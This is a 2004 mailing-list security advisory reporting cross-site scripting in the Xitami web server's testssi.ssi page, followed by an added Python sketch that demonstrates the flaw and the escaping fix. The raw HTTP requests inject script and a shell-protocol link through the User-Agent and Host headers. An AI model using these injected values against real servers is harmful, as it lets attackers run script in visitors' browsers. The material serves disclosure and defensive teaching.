Full Disclosure mailing list archives
XSS in Xitami testssi.ssi
From: "Oliver () greyhat de" <Oliver () greyhat de>
Date: Thu, 22 Jul 2004 13:11:52 +0200
Xitami Imatix testssi.ssi XSS
=============================

Xitami is an easy to use and open source webserver, running on several platforms.

What?
=====

Xitami Imatix 2.5c1 comes with the SSI test page /testssi.ssi, which delivers a website with the content of several SSI variables. Within the variables "HTTP_USER_AGENT" and "HTTP_REFERER", no (sufficient) content checking is done. The content of these variables is delivered by the web browser, and therefore can be manipulated by the user.

How?
====

Telnet (don't netcat!) to port 80:

    GET /testssi.ssi HTTP/1.1
    Host: localhost
    User-Agent: <A HREF="shell:windows\system32\calc.exe">PLEASE CLICK HERE</A>
    Connection: close

    GET /testssi.ssi HTTP/1.1
    Host: <script>alert("Please click at \"PLEASE CLICK HERE\"")</script>
    User-Agent: <A HREF="shell:windows\system32\calc.exe">PLEASE CLICK HERE</A>
    Connection: close

Misc:
=====

This_paper: www.oliverkarow.de/research/xitami25c1_testssi_XSS.txt
Screenshot: www.oliverkarow.de/research/xitami25c1_1.GIF
Screenshot: www.oliverkarow.de/research/xitami25c1_2.GIF
Version: 2.5c1 on Windows platform .... others not tested
Vendor: www.imatix.com
Date: 22.07.2004

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
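
Added example (not part of the original post, and not Xitami code): a Python sketch of a variable-dump page like the one described above, rendered once with the header values copied in verbatim, as reported, and once with HTML escaping applied before output. The Referer value, the function names and the table layout are assumptions made for this illustration.

```python
import html

# First request from the post; the Referer line is constructed for this example.
RAW_REQUEST = (
    "GET /testssi.ssi HTTP/1.1\r\n"
    "Host: localhost\r\n"
    'User-Agent: <A HREF="shell:windows\\system32\\calc.exe">PLEASE CLICK HERE</A>\r\n'
    'Referer: http://example.test/"><i>constructed</i>\r\n'
    "Connection: close\r\n\r\n"
)
ECHOED = ("HTTP_USER_AGENT", "HTTP_REFERER")  # the two variables the post names

def cgi_variables(raw):
    """Map request headers to CGI-style names (User-Agent -> HTTP_USER_AGENT)."""
    head = raw.split("\r\n\r\n", 1)[0]
    env = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            env["HTTP_" + name.strip().upper().replace("-", "_")] = value.strip()
    return env

def render(env, escape):
    """Build the variable-dump page; escape=False mirrors the reported behaviour."""
    rows = []
    for name in ECHOED:
        value = env.get(name, "")
        if escape:
            value = html.escape(value, quote=True)  # & < > " ' become entities
        rows.append(f"<tr><td>{name}</td><td>{value}</td></tr>")
    return "<table>\n" + "\n".join(rows) + "\n</table>"

def has_client_markup(page, env):
    """True if an echoed header value containing a tag appears verbatim in the page."""
    return any("<" in env.get(n, "") and env[n] in page for n in ECHOED)

if __name__ == "__main__":
    env = cgi_variables(RAW_REQUEST)
    print(render(env, escape=False))  # client-supplied tags reach the page as markup
    print(render(env, escape=True))   # the same values shown as inert text
```

The has_client_markup check can also serve as a regression test for any page that echoes request headers back to the browser.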